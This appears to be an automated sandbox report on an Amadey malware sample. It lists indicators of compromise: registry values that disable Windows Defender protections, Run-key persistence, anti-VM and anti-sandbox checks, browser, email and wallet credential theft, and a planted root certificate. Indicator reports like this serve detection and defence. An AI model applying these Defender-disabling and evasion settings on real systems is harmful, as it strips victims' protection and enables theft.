amadey | fedcaf57f0459c113cf0b609ec2713b111e50d25d15e321ccaa5dc89d72528e8

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	3e219c5fa8.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	3e219c5fa8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	3e219c5fa8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	3e219c5fa8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	3e219c5fa8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	3e219c5fa8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	3e219c5fa8.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	3e219c5fa8.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	3e219c5fa8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	3e219c5fa8.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1760 created 1260	1760	Organizations.com	21

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a910f73ee1f155ed585016e76cf5532c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	da9856c6cd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	844eeb687f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3e219c5fa8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a1648c690b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cbcc5b446e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cb979b8bfa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c50a3f63fa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6c01425f69.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9a7d1a3d45.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
17	3584	powershell.exe
21	3188	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3584	powershell.exe
3188	powershell.exe
1252	powershell.exe
2212	powershell.exe
1816	powershell.exe

Downloads MZ/PE file 26 IoCs

flow	pid	Process
11	2556	rapes.exe
21	3188	powershell.exe
5	2556	rapes.exe
13	2556	rapes.exe
13	2556	rapes.exe
16	2556	rapes.exe
27	2864	svchost015.exe
28	2556	rapes.exe
29	2556	rapes.exe
52	3544	6c01425f69.exe
52	3544	6c01425f69.exe
52	3544	6c01425f69.exe
52	3544	6c01425f69.exe
52	3544	6c01425f69.exe
52	3544	6c01425f69.exe
17	3584	powershell.exe
24	2556	rapes.exe
154	2556	rapes.exe
30	3580	svchost015.exe
22	2556	rapes.exe
25	2556	rapes.exe
12	2556	rapes.exe
35	2556	rapes.exe
35	2556	rapes.exe
35	2556	rapes.exe
35	2556	rapes.exe

Uses browser remote debugging 2 TTPs 5 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
2616	chrome.exe
836	chrome.exe
1700	chrome.exe
2824	chrome.exe
280	chrome.exe

Checks BIOS information in registry 2 TTPs 26 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	844eeb687f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6c01425f69.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a1648c690b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a910f73ee1f155ed585016e76cf5532c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a910f73ee1f155ed585016e76cf5532c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	da9856c6cd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	844eeb687f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3e219c5fa8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a1648c690b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cbcc5b446e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	da9856c6cd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3e219c5fa8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cb979b8bfa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6c01425f69.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cbcc5b446e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9a7d1a3d45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9a7d1a3d45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cb979b8bfa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c50a3f63fa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c50a3f63fa.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ArgCount.vbs	qQFhOl1.exe

Executes dropped EXE 32 IoCs

pid	Process
2556	rapes.exe
992	cb979b8bfa.exe
1416	iqvtNlb.exe
1788	01.exe
1020	RTH4oNP.exe
2096	qQFhOl1.exe
788	c50a3f63fa.exe
2864	svchost015.exe
3124	da9856c6cd.exe
3580	svchost015.exe
2280	c17573c992.exe
1488	TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE
3668	iqvtNlb.exe
4004	483d2fa8a0d53818306efeb32d3.exe
2340	tK0oYx3.exe
1888	xu5e1_003.exe
1516	RTH4oNP.exe
444	zx4PJh6.exe
1760	Organizations.com
3276	01.exe
3320	OkH8IPF.exe
1316	qQFhOl1.exe
3992	iqvtNlb.exe
3804	7ab6b77b2b.exe
2988	844eeb687f.exe
3544	6c01425f69.exe
2092	afb03093cf.exe
2476	3e219c5fa8.exe
1740	a1648c690b.exe
2384	cbcc5b446e.exe
884	9a7d1a3d45.exe
2472	5d8dc0c07d.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	844eeb687f.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	a1648c690b.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	9a7d1a3d45.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	cb979b8bfa.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	6c01425f69.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	3e219c5fa8.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	cbcc5b446e.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	a910f73ee1f155ed585016e76cf5532c.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	c50a3f63fa.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine	da9856c6cd.exe

Loads dropped DLL 64 IoCs

pid	Process
2704	a910f73ee1f155ed585016e76cf5532c.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
2272	WerFault.exe
2272	WerFault.exe
2272	WerFault.exe
2272	WerFault.exe
2556	rapes.exe
2820	WerFault.exe
2820	WerFault.exe
2820	WerFault.exe
2820	WerFault.exe
2820	WerFault.exe
2556	rapes.exe
2556	rapes.exe
788	c50a3f63fa.exe
2556	rapes.exe
2556	rapes.exe
3124	da9856c6cd.exe
2556	rapes.exe
3584	powershell.exe
2556	rapes.exe
2556	rapes.exe
3188	powershell.exe
2556	rapes.exe
2556	rapes.exe
3020	WerFault.exe
3020	WerFault.exe
3020	WerFault.exe
3020	WerFault.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
2976	WerFault.exe
2976	WerFault.exe
2976	WerFault.exe
2976	WerFault.exe
2556	rapes.exe
444	zx4PJh6.exe
956	CMD.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
2556	rapes.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
2556	rapes.exe
1760	Organizations.com
1760	Organizations.com
3888	WerFault.exe
3888	WerFault.exe
3888	WerFault.exe
3888	WerFault.exe
3888	WerFault.exe
2556	rapes.exe
2556	rapes.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	3e219c5fa8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	3e219c5fa8.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\afb03093cf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10329020101\\afb03093cf.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\3e219c5fa8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10329030101\\3e219c5fa8.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\c17573c992.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10328890101\\c17573c992.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10328900121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\844eeb687f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10329000101\\844eeb687f.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\6c01425f69.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10329010101\\6c01425f69.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0005000000019350-1549.dat	autoit_exe
behavioral1/files/0x000600000001c8bc-3894.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2496	tasklist.exe
3052	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
2704	a910f73ee1f155ed585016e76cf5532c.exe
2556	rapes.exe
992	cb979b8bfa.exe
788	c50a3f63fa.exe
3124	da9856c6cd.exe
1488	TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE
4004	483d2fa8a0d53818306efeb32d3.exe
2988	844eeb687f.exe
3544	6c01425f69.exe
2476	3e219c5fa8.exe
1740	a1648c690b.exe
2384	cbcc5b446e.exe
884	9a7d1a3d45.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 788 set thread context of 2864	788	c50a3f63fa.exe	43
PID 3124 set thread context of 3580	3124	da9856c6cd.exe	46

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	a910f73ee1f155ed585016e76cf5532c.exe
File opened for modification	C:\Windows\SheDrum	zx4PJh6.exe
File opened for modification	C:\Windows\InvestingTr	zx4PJh6.exe
File opened for modification	C:\Windows\OfficeForbes	zx4PJh6.exe
File opened for modification	C:\Windows\NecessityInfections	zx4PJh6.exe
File opened for modification	C:\Windows\VancouverPulse	zx4PJh6.exe
File opened for modification	C:\Windows\GuaranteesFear	zx4PJh6.exe
File opened for modification	C:\Windows\CylinderPair	zx4PJh6.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2820	2096	WerFault.exe	40
3888	1316	WerFault.exe	97

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iqvtNlb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xu5e1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cbcc5b446e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qQFhOl1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c01425f69.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	afb03093cf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3e219c5fa8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a910f73ee1f155ed585016e76cf5532c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a1648c690b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9a7d1a3d45.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c50a3f63fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	844eeb687f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	afb03093cf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c17573c992.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cb979b8bfa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Organizations.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qQFhOl1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	afb03093cf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	da9856c6cd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zx4PJh6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cbcc5b446e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6c01425f69.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cbcc5b446e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6c01425f69.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
3896	timeout.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 5 IoCs

pid	Process
1648	taskkill.exe
868	taskkill.exe
3964	taskkill.exe
1508	taskkill.exe
3572	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	cbcc5b446e.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	cbcc5b446e.exe
